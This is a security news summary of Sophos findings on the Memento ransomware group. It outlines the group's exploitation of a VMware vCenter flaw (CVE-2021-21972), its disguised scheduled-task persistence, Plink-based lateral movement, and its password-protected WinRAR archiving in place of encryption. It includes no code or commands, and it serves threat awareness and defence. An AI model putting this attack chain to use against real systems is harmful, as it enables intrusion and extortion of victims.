Researchers have observed a new ransomware group, dubbed Memento Team, taking a different approach for locking files after failing in its previous attacks. Instead of encrypting the files, the group is using a customized freeware version of WinRAR and deleting the original files to carry out attacks.

What was detected?

Researchers from Sophos identified that the Memento Team is active since last month and attempting to target VMware vCenter Server.
  • For carrying out these attacks, they used a plethora of tools and tricks that have a specific use for each stage of the attack. 
  • The attackers targeted a flaw in the VMware vCenter Server web client to obtain initial access to target networks.
  • The vulnerability, tracked as CVE-2021-21972, is a remote code execution flaw that allows attackers to access the exposed vCenter server to execute commands via TCP/IP port 443.
  • After the attack, hackers dropped a ransom note that demanded victims to pay 0.099 BTC ($5,850) to decrypt each file or an alternative payment of 15.95 BTC ($940,000) to recover all files. 

Persistence and reconnaissance

  • They established persistence over the target network through scheduled tasks (named Windows Defender Metadata Monitor). 
  • Consequently, they used RDP over SSH via Plink to spread laterally within the network.

Post-reconnaissance

  • After reconnaissance, attackers used WinRAR to archive the files. 
  • They used a strong password for access and deleted the original files. 
  • The keys were further protected via encryption.

Memento’s earlier failed attempt 

Researchers identified that Memento was attempting to exploit the vCenter vulnerability since April. 
  • The attackers had used BCWipe, the data wiping utility tool from Jetico, to delete any traces of data. Then, they used a Python-based ransomware strain for AES-based encryption.
  • However, that attempt by Memento was not successful. The systems were protected with an anti-ransomware solution, which detected and prevented the encryption step before causing any damage.

Ending notes

Memento operators are using uncommon methods to target their victims, although, they were able to dodge these attacks by using anti-ransomware solutions. Moreover, some victims were able to reduce the damage of ransomware attacks by using data backups. This highlights the importance of such protective methods in the fight against ransomware attacks.
Cyware Publisher

Publisher

Cyware